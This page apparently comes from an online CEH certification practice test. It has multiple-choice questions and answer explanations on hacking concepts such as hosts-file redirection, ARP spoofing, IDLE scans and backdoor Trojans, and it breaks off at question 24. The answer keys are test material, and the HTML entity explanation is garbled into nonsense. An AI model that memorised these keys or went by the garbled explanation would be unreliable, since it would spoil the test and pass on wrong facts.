You have already completed the Test before. Hence you can not start it again.
Test is loading...
You must sign in or sign up to start the Test.
You have to finish following quiz, to start this Test:
Your results are here!! for" CEH Practice Test 6 "
0 of 100 questions answered correctly
Your time:
Time has elapsed
Your Final Score is : 0
You have attempted : 0
Number of Correct Questions : 0 and scored 0
Number of Incorrect Questions : 0 and Negative marks 0
Average score
Your score
CEH
You have attempted: 0
Number of Correct Questions: 0 and scored 0
Number of Incorrect Questions: 0 and Negative marks 0
You can review your answers by clicking view questions. Important Note : Open Reference Documentation Links in New Tab (Right Click and Open in New Tab).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
Answered
Review
Question 1 of 100
1. Question
Phishing, pop-ups, and IRC channel use are all examples of which type of social engineering attack?
Correct
Correct Answer:
Computer based is correct.
Computer-based social engineering attacks include any measures using computers and technology.
Incorrect Answers:
Human based, Technical, and Vishing are incorrect.
Human-based social engineering uses interaction in conversation or other circumstances between people to gather useful information.
There is no such thing as a “technical” social engineering attack.
Using a phone during a social engineering effort is known as “vishing” (for “voice phishing”).
Incorrect
Correct Answer:
Computer based is correct.
Computer-based social engineering attacks include any measures using computers and technology.
Incorrect Answers:
Human based, Technical, and Vishing are incorrect.
Human-based social engineering uses interaction in conversation or other circumstances between people to gather useful information.
There is no such thing as a “technical” social engineering attack.
Using a phone during a social engineering effort is known as “vishing” (for “voice phishing”).
Unattempted
Correct Answer:
Computer based is correct.
Computer-based social engineering attacks include any measures using computers and technology.
Incorrect Answers:
Human based, Technical, and Vishing are incorrect.
Human-based social engineering uses interaction in conversation or other circumstances between people to gather useful information.
There is no such thing as a “technical” social engineering attack.
Using a phone during a social engineering effort is known as “vishing” (for “voice phishing”).
Question 2 of 100
2. Question
Which flags are set in the segment during the second step of the TCP three-way handshake?
Correct
Correct Answer:
SYN-ACK is correct.
A three-way TCP handshake has the originator forward a SYN. The recipient, in step 2, sends a SYN and an ACK. In step 3, the originator responds with an ACK.
Incorrect Answers:
SYN, ACK, and ACK-FIN are incorrect.
The steps are referred to as SYN, SYN-ACK, and ACK.
Incorrect
Correct Answer:
SYN-ACK is correct.
A three-way TCP handshake has the originator forward a SYN. The recipient, in step 2, sends a SYN and an ACK. In step 3, the originator responds with an ACK.
Incorrect Answers:
SYN, ACK, and ACK-FIN are incorrect.
The steps are referred to as SYN, SYN-ACK, and ACK.
Unattempted
Correct Answer:
SYN-ACK is correct.
A three-way TCP handshake has the originator forward a SYN. The recipient, in step 2, sends a SYN and an ACK. In step 3, the originator responds with an ACK.
Incorrect Answers:
SYN, ACK, and ACK-FIN are incorrect.
The steps are referred to as SYN, SYN-ACK, and ACK.
Question 3 of 100
3. Question
You are monitoring the activities of your pen test team and notice one member opening Airsnarf. What is he trying to accomplish?
Correct
Correct Answer:
He is trying to sniff passwords and user IDs is correct.
Airsnarf does a great job of sniffing passwords and authentication traffic.
Incorrect Answers:
He is trying to locate rogue access points on the network, He is verifying signal strength from access points in the network, and He is attempting a denial-of-service attack on the access point are incorrect.
Airsnarf does not locate rogue APs, nor does it monitor signal strength.
Also, Airsnarf does not attempt DoS attacks.
Incorrect
Correct Answer:
He is trying to sniff passwords and user IDs is correct.
Airsnarf does a great job of sniffing passwords and authentication traffic.
Incorrect Answers:
He is trying to locate rogue access points on the network, He is verifying signal strength from access points in the network, and He is attempting a denial-of-service attack on the access point are incorrect.
Airsnarf does not locate rogue APs, nor does it monitor signal strength.
Also, Airsnarf does not attempt DoS attacks.
Unattempted
Correct Answer:
He is trying to sniff passwords and user IDs is correct.
Airsnarf does a great job of sniffing passwords and authentication traffic.
Incorrect Answers:
He is trying to locate rogue access points on the network, He is verifying signal strength from access points in the network, and He is attempting a denial-of-service attack on the access point are incorrect.
Airsnarf does not locate rogue APs, nor does it monitor signal strength.
Also, Airsnarf does not attempt DoS attacks.
Question 4 of 100
4. Question
Your customer is concerned about weak passwords in the environment and asks you to specifically test for them. Which of the following are you least likely to do?
Correct
Correct answer:
Announce to the users when you will begin testing is correct. If the goal is to see if there are weak passwords being used in the environment on an average day, why in the world would you make it an uncommon day by telling people to change their passwords right before you start testing?
Incorrect answers:
All of these actions make perfect sense regarding an ethical hacker being asked to test and report on weak passwords.
Incorrect
Correct answer:
Announce to the users when you will begin testing is correct. If the goal is to see if there are weak passwords being used in the environment on an average day, why in the world would you make it an uncommon day by telling people to change their passwords right before you start testing?
Incorrect answers:
All of these actions make perfect sense regarding an ethical hacker being asked to test and report on weak passwords.
Unattempted
Correct answer:
Announce to the users when you will begin testing is correct. If the goal is to see if there are weak passwords being used in the environment on an average day, why in the world would you make it an uncommon day by telling people to change their passwords right before you start testing?
Incorrect answers:
All of these actions make perfect sense regarding an ethical hacker being asked to test and report on weak passwords.
Question 5 of 100
5. Question
An attacker gains access to a Windows machine and wants to redirect users requests for certain websites to IP addresses he maintains. Which of the following files should he edit?
Correct
Correct answer:
hosts is correct. A Windows system goes through the same process for every name-to-IP resolution. First, it checks its own cache to see if the requested name has already been looked up. Next, it checks the hosts file. The hosts file is a plain-text file that is used to manually map names to IP addresses. If an attacker were to gain access to the hosts file, he could add any name to IP mapping he wanted, ensuring the victim wouldn’t even recognize a problem was occurring.
Incorrect answers:
The passwd file holds passwords in Linux systems.
The lmhosts file maps IP addresses to NetBIOS names, much like the hosts file does for DNS names.
The SAM file holds the local password hashes on a Windows system.
Incorrect
Correct answer:
hosts is correct. A Windows system goes through the same process for every name-to-IP resolution. First, it checks its own cache to see if the requested name has already been looked up. Next, it checks the hosts file. The hosts file is a plain-text file that is used to manually map names to IP addresses. If an attacker were to gain access to the hosts file, he could add any name to IP mapping he wanted, ensuring the victim wouldn’t even recognize a problem was occurring.
Incorrect answers:
The passwd file holds passwords in Linux systems.
The lmhosts file maps IP addresses to NetBIOS names, much like the hosts file does for DNS names.
The SAM file holds the local password hashes on a Windows system.
Unattempted
Correct answer:
hosts is correct. A Windows system goes through the same process for every name-to-IP resolution. First, it checks its own cache to see if the requested name has already been looked up. Next, it checks the hosts file. The hosts file is a plain-text file that is used to manually map names to IP addresses. If an attacker were to gain access to the hosts file, he could add any name to IP mapping he wanted, ensuring the victim wouldn’t even recognize a problem was occurring.
Incorrect answers:
The passwd file holds passwords in Linux systems.
The lmhosts file maps IP addresses to NetBIOS names, much like the hosts file does for DNS names.
The SAM file holds the local password hashes on a Windows system.
Question 6 of 100
6. Question
Which of the following copies into the system32 folder on Windows machines and creates a back door?
Correct
Correct answer:
Poison Ivy is correct. Poison Ivy provides a full remote-control back door on infected systems and copies itself directly into /system32.
Incorrect answers:
SubRoot, from 2009, creates a full-control back door over port 1700 (TCP).
Restorator is a defacement Trojan.
Biodox is a GUI full remote-control Trojan.
Incorrect
Correct answer:
Poison Ivy is correct. Poison Ivy provides a full remote-control back door on infected systems and copies itself directly into /system32.
Incorrect answers:
SubRoot, from 2009, creates a full-control back door over port 1700 (TCP).
Restorator is a defacement Trojan.
Biodox is a GUI full remote-control Trojan.
Unattempted
Correct answer:
Poison Ivy is correct. Poison Ivy provides a full remote-control back door on infected systems and copies itself directly into /system32.
Incorrect answers:
SubRoot, from 2009, creates a full-control back door over port 1700 (TCP).
Restorator is a defacement Trojan.
Biodox is a GUI full remote-control Trojan.
Question 7 of 100
7. Question
Which nmap script can be used to show potentially risky HTTP methods?
Correct
Correct anser:
http-methods is correct. Per nmap’s website (https://nmap.org), the http-methods script “finds out what options are supported by an HTTP server by sending an OPTIONS request and lists potentially risky methods. Any output other than 501/405 suggests that the method is if not in the range 400 to 600. If the response falls under that range then it is compared to the response from a randomly generated method. In this script, ‘potentially risky’ methods are anything except GET, HEAD, POST, and OPTIONS.”
Incorrect answers:
All other answers are incorrect. These are not valid nmap scripts.
Incorrect
Correct anser:
http-methods is correct. Per nmap’s website (https://nmap.org), the http-methods script “finds out what options are supported by an HTTP server by sending an OPTIONS request and lists potentially risky methods. Any output other than 501/405 suggests that the method is if not in the range 400 to 600. If the response falls under that range then it is compared to the response from a randomly generated method. In this script, ‘potentially risky’ methods are anything except GET, HEAD, POST, and OPTIONS.”
Incorrect answers:
All other answers are incorrect. These are not valid nmap scripts.
Unattempted
Correct anser:
http-methods is correct. Per nmap’s website (https://nmap.org), the http-methods script “finds out what options are supported by an HTTP server by sending an OPTIONS request and lists potentially risky methods. Any output other than 501/405 suggests that the method is if not in the range 400 to 600. If the response falls under that range then it is compared to the response from a randomly generated method. In this script, ‘potentially risky’ methods are anything except GET, HEAD, POST, and OPTIONS.”
Incorrect answers:
All other answers are incorrect. These are not valid nmap scripts.
Question 8 of 100
8. Question
The < character opens an HTML tag, and the > character closes it. In some web forms, input validation may deny these characters to protect against XSS. Which of the following represent the HTML entities used in place of these characters? (Choose two.)
Correct
Correct Answer:
< and > are correct.
Whether attempting to bypass input validation or just having things appear the way you want them to on a web page, HTML entities can be useful. The less-than sign (<) equates to <:, and the greater-than sign (>) equates to >. You can also use their respective numbered equivalents (< and >).
Incorrect Answers:
&, ®, and are incorrect.
& equates to the ampersand (&), and ® equates to the Registered symbol, ®. is a nonbreaking space.
Incorrect
Correct Answer:
< and > are correct.
Whether attempting to bypass input validation or just having things appear the way you want them to on a web page, HTML entities can be useful. The less-than sign (<) equates to <:, and the greater-than sign (>) equates to >. You can also use their respective numbered equivalents (< and >).
Incorrect Answers:
&, ®, and are incorrect.
& equates to the ampersand (&), and ® equates to the Registered symbol, ®. is a nonbreaking space.
Unattempted
Correct Answer:
< and > are correct.
Whether attempting to bypass input validation or just having things appear the way you want them to on a web page, HTML entities can be useful. The less-than sign (<) equates to <:, and the greater-than sign (>) equates to >. You can also use their respective numbered equivalents (< and >).
Incorrect Answers:
&, ®, and are incorrect.
& equates to the ampersand (&), and ® equates to the Registered symbol, ®. is a nonbreaking space.
Question 9 of 100
9. Question
You implement a firewall on the edge of your private network. Which of the following best describes this control effort?
Correct
Correct answer:
Technical preventive control is correct. A firewall is a technical control and is preventive in nature. Controls are generally preventive, corrective, or detective in nature; however, they may also be labeled as directive, deterrent, or compensating.
Incorrect answers:
All other answers are incorrect. A firewall is neither a physical control nor detective or corrective.
Incorrect
Correct answer:
Technical preventive control is correct. A firewall is a technical control and is preventive in nature. Controls are generally preventive, corrective, or detective in nature; however, they may also be labeled as directive, deterrent, or compensating.
Incorrect answers:
All other answers are incorrect. A firewall is neither a physical control nor detective or corrective.
Unattempted
Correct answer:
Technical preventive control is correct. A firewall is a technical control and is preventive in nature. Controls are generally preventive, corrective, or detective in nature; however, they may also be labeled as directive, deterrent, or compensating.
Incorrect answers:
All other answers are incorrect. A firewall is neither a physical control nor detective or corrective.
Question 10 of 100
10. Question
Which of the following cipher types transforms a fixed-length block of plain text into cipher text of the same length?
Correct
Correct answer:
Block is correct. Block ciphers symmetrically encrypt fixed-length portions of plain text.
Incorrect answers:
Stream ciphers encrypt bit by bit.
Bit and hash are invalid answers for this question.
Incorrect
Correct answer:
Block is correct. Block ciphers symmetrically encrypt fixed-length portions of plain text.
Incorrect answers:
Stream ciphers encrypt bit by bit.
Bit and hash are invalid answers for this question.
Unattempted
Correct answer:
Block is correct. Block ciphers symmetrically encrypt fixed-length portions of plain text.
Incorrect answers:
Stream ciphers encrypt bit by bit.
Bit and hash are invalid answers for this question.
Question 11 of 100
11. Question
What does no response from a port during an XMAS scan indicate?
Correct
Correct Answer:
The port is open is correct.
No response from a port during an XMAS scan indicates it is open. If a RST packet is received, the port is considered closed, while no response means it is open (or possibly filtered). The port is marked filtered if an ICMP unreachable error (Type 3, Code 0, 1, 2, 3, 9, 10, or 13) is received.
Incorrect Answers:
The port is closed, The scan has failed to reach the target, and None of the above are incorrect.
A RST/ACK would indicate a closed port.
No response does not necessarily indicate the target has not been reached.
Incorrect
Correct Answer:
The port is open is correct.
No response from a port during an XMAS scan indicates it is open. If a RST packet is received, the port is considered closed, while no response means it is open (or possibly filtered). The port is marked filtered if an ICMP unreachable error (Type 3, Code 0, 1, 2, 3, 9, 10, or 13) is received.
Incorrect Answers:
The port is closed, The scan has failed to reach the target, and None of the above are incorrect.
A RST/ACK would indicate a closed port.
No response does not necessarily indicate the target has not been reached.
Unattempted
Correct Answer:
The port is open is correct.
No response from a port during an XMAS scan indicates it is open. If a RST packet is received, the port is considered closed, while no response means it is open (or possibly filtered). The port is marked filtered if an ICMP unreachable error (Type 3, Code 0, 1, 2, 3, 9, 10, or 13) is received.
Incorrect Answers:
The port is closed, The scan has failed to reach the target, and None of the above are incorrect.
A RST/ACK would indicate a closed port.
No response does not necessarily indicate the target has not been reached.
Question 12 of 100
12. Question
As your IDLE scan moves along, you notice that fragment identification numbers gleaned from the zombie machine are incrementing randomly. What does this mean?
Correct
Correct Answer:
Your IDLE scan results will not be useful to you is correct.
It is absolutely essential the zombie remain idle to all other traffic during an IDLE scan. The attacker will send packets to the target with the (spoofed) source address of the zombie. If the port is open, the target will respond to the SYN packet with a SYN/ACK, but this will be sent to the zombie. The zombie system will then craft a RST packet in answer to the unsolicited SYN/ACK, and the IPID will increase. If this occurs randomly, then it’s probable your zombie is not, in fact, idle, and your results are moot.
Incorrect Answers:
The zombie system is a honeypot, There is a misbehaving firewall between you and the zombie machine, and This is an expected result during an IDLE scan are incorrect.
There is not enough information here to identify the zombie machine as anything at all—much less a machine set up as a honeypot—and a firewall has nothing to do with any of this. This is also not expected behavior during an IDLE scan.
Incorrect
Correct Answer:
Your IDLE scan results will not be useful to you is correct.
It is absolutely essential the zombie remain idle to all other traffic during an IDLE scan. The attacker will send packets to the target with the (spoofed) source address of the zombie. If the port is open, the target will respond to the SYN packet with a SYN/ACK, but this will be sent to the zombie. The zombie system will then craft a RST packet in answer to the unsolicited SYN/ACK, and the IPID will increase. If this occurs randomly, then it’s probable your zombie is not, in fact, idle, and your results are moot.
Incorrect Answers:
The zombie system is a honeypot, There is a misbehaving firewall between you and the zombie machine, and This is an expected result during an IDLE scan are incorrect.
There is not enough information here to identify the zombie machine as anything at all—much less a machine set up as a honeypot—and a firewall has nothing to do with any of this. This is also not expected behavior during an IDLE scan.
Unattempted
Correct Answer:
Your IDLE scan results will not be useful to you is correct.
It is absolutely essential the zombie remain idle to all other traffic during an IDLE scan. The attacker will send packets to the target with the (spoofed) source address of the zombie. If the port is open, the target will respond to the SYN packet with a SYN/ACK, but this will be sent to the zombie. The zombie system will then craft a RST packet in answer to the unsolicited SYN/ACK, and the IPID will increase. If this occurs randomly, then it’s probable your zombie is not, in fact, idle, and your results are moot.
Incorrect Answers:
The zombie system is a honeypot, There is a misbehaving firewall between you and the zombie machine, and This is an expected result during an IDLE scan are incorrect.
There is not enough information here to identify the zombie machine as anything at all—much less a machine set up as a honeypot—and a firewall has nothing to do with any of this. This is also not expected behavior during an IDLE scan.
Question 13 of 100
13. Question
Within a PKI, which of the following verifies the applicant?
Correct
Correct Answer:
Registration authority is correct.
A registration authority (RA) validates an applicant into the system, making sure they are real, valid, and allowed to use the system. RAs are also known as “subordinate CAs.”
Incorrect Answers:
CRL, Revocation authority, and Primary authority are incorrect.
The CRL (Certificate Revocation List) used to track which certificates have problems and which have been revoked. The remaining terms are not legitimate.
Incorrect
Correct Answer:
Registration authority is correct.
A registration authority (RA) validates an applicant into the system, making sure they are real, valid, and allowed to use the system. RAs are also known as “subordinate CAs.”
Incorrect Answers:
CRL, Revocation authority, and Primary authority are incorrect.
The CRL (Certificate Revocation List) used to track which certificates have problems and which have been revoked. The remaining terms are not legitimate.
Unattempted
Correct Answer:
Registration authority is correct.
A registration authority (RA) validates an applicant into the system, making sure they are real, valid, and allowed to use the system. RAs are also known as “subordinate CAs.”
Incorrect Answers:
CRL, Revocation authority, and Primary authority are incorrect.
The CRL (Certificate Revocation List) used to track which certificates have problems and which have been revoked. The remaining terms are not legitimate.
Question 14 of 100
14. Question
Which of the following tools silently copies all files from a USB when it is connected to the system?
Correct
Correct answer:
USB Dumper is correct. USB Dumper copies the files and folders from the flash drive silently when it connected to the PC.
Incorrect answers:
Snoopy is a sniffer for Windows.
HackRFone is used in rolling code attacks.
KeyLLama is a keylogger.
Incorrect
Correct answer:
USB Dumper is correct. USB Dumper copies the files and folders from the flash drive silently when it connected to the PC.
Incorrect answers:
Snoopy is a sniffer for Windows.
HackRFone is used in rolling code attacks.
KeyLLama is a keylogger.
Unattempted
Correct answer:
USB Dumper is correct. USB Dumper copies the files and folders from the flash drive silently when it connected to the PC.
Incorrect answers:
Snoopy is a sniffer for Windows.
HackRFone is used in rolling code attacks.
KeyLLama is a keylogger.
Question 15 of 100
15. Question
X.509 defines the standard for digital certificates. Per this standard, which of the following are fields within a certificate? (Choose all that apply.)
Correct
Correct answers:
Version, algorithm ID, public key and key usage are correct. X.509 is an ITU-T standard defining all sorts of things regarding PKI, including the digital certificate and what it holds. It identifies several components of a digital certificate, including the version, the algorithm ID, a copy of the public key, and the key usage description.
Incorrect answers:
The private key is never shared.
A PTR record is a DNS record type, not a component of a digital signature.
Incorrect
Correct answers:
Version, algorithm ID, public key and key usage are correct. X.509 is an ITU-T standard defining all sorts of things regarding PKI, including the digital certificate and what it holds. It identifies several components of a digital certificate, including the version, the algorithm ID, a copy of the public key, and the key usage description.
Incorrect answers:
The private key is never shared.
A PTR record is a DNS record type, not a component of a digital signature.
Unattempted
Correct answers:
Version, algorithm ID, public key and key usage are correct. X.509 is an ITU-T standard defining all sorts of things regarding PKI, including the digital certificate and what it holds. It identifies several components of a digital certificate, including the version, the algorithm ID, a copy of the public key, and the key usage description.
Incorrect answers:
The private key is never shared.
A PTR record is a DNS record type, not a component of a digital signature.
Question 16 of 100
16. Question
OWASP releases several Top Ten lists. On their top security priorities, one entry includes flaws that allow attackers to compromise passwords, encryption keys, and session tokens. Which of the following matches this description best?
Correct
Correct answer:
Broken Authentication is correct. I admit it—this one is really, really picky. Broken Authentication is second on the list of security priorities in OWASP’s 2017 list, and best matches the question parameters. The following is taken directly from the list: “Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.”
Incorrect answers:
The site states the following on Injection (#1): “Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.”
The site states the following about Insecure Direct Object References (#4): “A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.”
And, finally, the website has this to say about Security Misconfiguration (#5): “Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.”
Incorrect
Correct answer:
Broken Authentication is correct. I admit it—this one is really, really picky. Broken Authentication is second on the list of security priorities in OWASP’s 2017 list, and best matches the question parameters. The following is taken directly from the list: “Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.”
Incorrect answers:
The site states the following on Injection (#1): “Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.”
The site states the following about Insecure Direct Object References (#4): “A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.”
And, finally, the website has this to say about Security Misconfiguration (#5): “Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.”
Unattempted
Correct answer:
Broken Authentication is correct. I admit it—this one is really, really picky. Broken Authentication is second on the list of security priorities in OWASP’s 2017 list, and best matches the question parameters. The following is taken directly from the list: “Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.”
Incorrect answers:
The site states the following on Injection (#1): “Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.”
The site states the following about Insecure Direct Object References (#4): “A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.”
And, finally, the website has this to say about Security Misconfiguration (#5): “Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.”
Question 17 of 100
17. Question
Which of the following describes the risk that remains after the vulnerabilities are classified and the countermeasures have been deployed?
Correct
Correct Answer:
Residual risk is correct.
Residual risk is exactly what it sounds like—risk that remains after the application of security controls.
Incorrect Answers:
Evaluated risk, Inherent risk, and Deferred risk are incorrect.
Evaluated risk doesn’t exist (at least as a vulnerability management term for your studies). Inherent risk is the actual risk itself before the application of any controls. Deferred risk is another pretty straightforward term: risk that is deferred to a later time.
Incorrect
Correct Answer:
Residual risk is correct.
Residual risk is exactly what it sounds like—risk that remains after the application of security controls.
Incorrect Answers:
Evaluated risk, Inherent risk, and Deferred risk are incorrect.
Evaluated risk doesn’t exist (at least as a vulnerability management term for your studies). Inherent risk is the actual risk itself before the application of any controls. Deferred risk is another pretty straightforward term: risk that is deferred to a later time.
Unattempted
Correct Answer:
Residual risk is correct.
Residual risk is exactly what it sounds like—risk that remains after the application of security controls.
Incorrect Answers:
Evaluated risk, Inherent risk, and Deferred risk are incorrect.
Evaluated risk doesn’t exist (at least as a vulnerability management term for your studies). Inherent risk is the actual risk itself before the application of any controls. Deferred risk is another pretty straightforward term: risk that is deferred to a later time.
Question 18 of 100
18. Question
Which of the following is the best way to defend against network sniffing?
Correct
Correct answer:
Implement encryption throughout the environment. is correct. Encryption is the enemy of sniffing (and IDS). After all, if it’s encrypted at point A and decrypted only at point B, any effort to examine it in between is pointless. Of the choices, this is the best available option.
Incorrect answers:
All other answers are incorrect. Physical security and static IP addressing won’t do a thing about sniffing. MAC access control can provide some protection, but not at the level encryption could.
Incorrect
Correct answer:
Implement encryption throughout the environment. is correct. Encryption is the enemy of sniffing (and IDS). After all, if it’s encrypted at point A and decrypted only at point B, any effort to examine it in between is pointless. Of the choices, this is the best available option.
Incorrect answers:
All other answers are incorrect. Physical security and static IP addressing won’t do a thing about sniffing. MAC access control can provide some protection, but not at the level encryption could.
Unattempted
Correct answer:
Implement encryption throughout the environment. is correct. Encryption is the enemy of sniffing (and IDS). After all, if it’s encrypted at point A and decrypted only at point B, any effort to examine it in between is pointless. Of the choices, this is the best available option.
Incorrect answers:
All other answers are incorrect. Physical security and static IP addressing won’t do a thing about sniffing. MAC access control can provide some protection, but not at the level encryption could.
Question 19 of 100
19. Question
Your new employee is pen testing a fully switched subnet and wants to know how to proceed. Which of the following methods might be useful for sniffing traffic in this situation? (Choose all that apply.)
Correct
Correct answers:
ARP spoofing, span port, and MAC flooding are correct. Spoofing ARP messages can trick the switch into sending traffic your way, and MAC flooding turns the switch into a hub. Spanning a port requires access to the switch IOS itself but would provide access to traffic.
Incorrect answer:
Port security would frustrate your efforts to sniff traffic.
Incorrect
Correct answers:
ARP spoofing, span port, and MAC flooding are correct. Spoofing ARP messages can trick the switch into sending traffic your way, and MAC flooding turns the switch into a hub. Spanning a port requires access to the switch IOS itself but would provide access to traffic.
Incorrect answer:
Port security would frustrate your efforts to sniff traffic.
Unattempted
Correct answers:
ARP spoofing, span port, and MAC flooding are correct. Spoofing ARP messages can trick the switch into sending traffic your way, and MAC flooding turns the switch into a hub. Spanning a port requires access to the switch IOS itself but would provide access to traffic.
Incorrect answer:
Port security would frustrate your efforts to sniff traffic.
Question 20 of 100
20. Question
Which of the following statements is true regarding the use of a proxy server on your network?
Correct
Correct answer:
Proxy servers can filter Internet traffic for internal hosts is correct. Proxy servers stand in the stead of internal hosts. You can have them go out of the network and do all the dirty work for you, or you can have them “host” services for you. Providing controlled access to Internet traffic with a proxy is an excellent example—browsers point to a proxy that then handles the work of grabbing and returning requested data.
Incorrect answers:
All other answers are incorrect.
IDS monitors traffic, and DHCP servers automate addressing. A web server would be used to host a website, not a proxy.
Incorrect
Correct answer:
Proxy servers can filter Internet traffic for internal hosts is correct. Proxy servers stand in the stead of internal hosts. You can have them go out of the network and do all the dirty work for you, or you can have them “host” services for you. Providing controlled access to Internet traffic with a proxy is an excellent example—browsers point to a proxy that then handles the work of grabbing and returning requested data.
Incorrect answers:
All other answers are incorrect.
IDS monitors traffic, and DHCP servers automate addressing. A web server would be used to host a website, not a proxy.
Unattempted
Correct answer:
Proxy servers can filter Internet traffic for internal hosts is correct. Proxy servers stand in the stead of internal hosts. You can have them go out of the network and do all the dirty work for you, or you can have them “host” services for you. Providing controlled access to Internet traffic with a proxy is an excellent example—browsers point to a proxy that then handles the work of grabbing and returning requested data.
Incorrect answers:
All other answers are incorrect.
IDS monitors traffic, and DHCP servers automate addressing. A web server would be used to host a website, not a proxy.
Question 21 of 100
21. Question
Which of the following IoT communication models adds a collective entity before sending data to the cloud?
Correct
Correct answer:
Device to gateway is correct. An IoT gateway is a device designed to send collected data from IoT devices to the user or to data storage (the cloud) for use later. Implementing this model may allow for the application of additional security controls.
Incorrect answers:
Device to device is exactly what it sounds like
Back-end data sharing adds third-party access to your data on the cloud side.
Device to thing does not exist.
Incorrect
Correct answer:
Device to gateway is correct. An IoT gateway is a device designed to send collected data from IoT devices to the user or to data storage (the cloud) for use later. Implementing this model may allow for the application of additional security controls.
Incorrect answers:
Device to device is exactly what it sounds like
Back-end data sharing adds third-party access to your data on the cloud side.
Device to thing does not exist.
Unattempted
Correct answer:
Device to gateway is correct. An IoT gateway is a device designed to send collected data from IoT devices to the user or to data storage (the cloud) for use later. Implementing this model may allow for the application of additional security controls.
Incorrect answers:
Device to device is exactly what it sounds like
Back-end data sharing adds third-party access to your data on the cloud side.
Device to thing does not exist.
Question 22 of 100
22. Question
Which one of the following DoS categories goes after load balancers, firewalls, and application servers by attacking connection state tables?
Correct
Correct answer:
TCP state-exhaustion attacks is correct. These attacks go after load balancers, firewalls, and application servers by attempting to consume their connection state tables.
Incorrect answers:
Volumetric attacks, also known as bandwidth attacks, consume all available bandwidth for the system or service.
Application attacks consume resources necessary for the application to run, effectively making it unavailable to others.
Fragmentation attacks take advantage of the system’s ability (or lack thereof) to reconstruct fragmented packets.
Incorrect
Correct answer:
TCP state-exhaustion attacks is correct. These attacks go after load balancers, firewalls, and application servers by attempting to consume their connection state tables.
Incorrect answers:
Volumetric attacks, also known as bandwidth attacks, consume all available bandwidth for the system or service.
Application attacks consume resources necessary for the application to run, effectively making it unavailable to others.
Fragmentation attacks take advantage of the system’s ability (or lack thereof) to reconstruct fragmented packets.
Unattempted
Correct answer:
TCP state-exhaustion attacks is correct. These attacks go after load balancers, firewalls, and application servers by attempting to consume their connection state tables.
Incorrect answers:
Volumetric attacks, also known as bandwidth attacks, consume all available bandwidth for the system or service.
Application attacks consume resources necessary for the application to run, effectively making it unavailable to others.
Fragmentation attacks take advantage of the system’s ability (or lack thereof) to reconstruct fragmented packets.
Question 23 of 100
23. Question
Which of the following may be useful in mitigation against phishing? (Choose all that apply.)
Correct
Correct answers:
Netcraft Toolbar and PhishTank Toolbar are correct. Although nothing is foolproof, a couple of options can assist in protecting against phishing. The Netcraft Toolbar and the PhishTank Toolbar can help in identifying risky sites and phishing behavior.
Incorrect answers:
All other answers are incorrect.
IDSs are great to have, and can help in identifying the effects after social engineering has succeeded, but they do nothing to prevent phishing.
Incorrect
Correct answers:
Netcraft Toolbar and PhishTank Toolbar are correct. Although nothing is foolproof, a couple of options can assist in protecting against phishing. The Netcraft Toolbar and the PhishTank Toolbar can help in identifying risky sites and phishing behavior.
Incorrect answers:
All other answers are incorrect.
IDSs are great to have, and can help in identifying the effects after social engineering has succeeded, but they do nothing to prevent phishing.
Unattempted
Correct answers:
Netcraft Toolbar and PhishTank Toolbar are correct. Although nothing is foolproof, a couple of options can assist in protecting against phishing. The Netcraft Toolbar and the PhishTank Toolbar can help in identifying risky sites and phishing behavior.
Incorrect answers:
All other answers are incorrect.
IDSs are great to have, and can help in identifying the effects after social engineering has succeeded, but they do nothing to prevent phishing.
Question 24 of 100
24. Question
You want to peruse metatdata from publicly available documents to learn more about your target. Which of the following tools can help with this?
Correct
Correct answer:
Metagoofil is correct. Metagoofil is an information-gathering tool designed for extracting metadata of public documents (.pdf, .doc, .xls, .ppt, .docx, .pptx, and .xlsx) belonging to a target company. Metagoofil will perform a search in Google to identify and download the documents to local disk and then will extract the metadata with different libraries such as Hachoir, PdfMiner, and others. With the results, it will generate a report with usernames, software versions, and server or machine names that will help penetration testers in the information-gathering phase.
Incorrect answers:
All other answers are incorrect. None of the remaining tools performs this task.
Incorrect
Correct answer:
Metagoofil is correct. Metagoofil is an information-gathering tool designed for extracting metadata of public documents (.pdf, .doc, .xls, .ppt, .docx, .pptx, and .xlsx) belonging to a target company. Metagoofil will perform a search in Google to identify and download the documents to local disk and then will extract the metadata with different libraries such as Hachoir, PdfMiner, and others. With the results, it will generate a report with usernames, software versions, and server or machine names that will help penetration testers in the information-gathering phase.
Incorrect answers:
All other answers are incorrect. None of the remaining tools performs this task.
Unattempted
Correct answer:
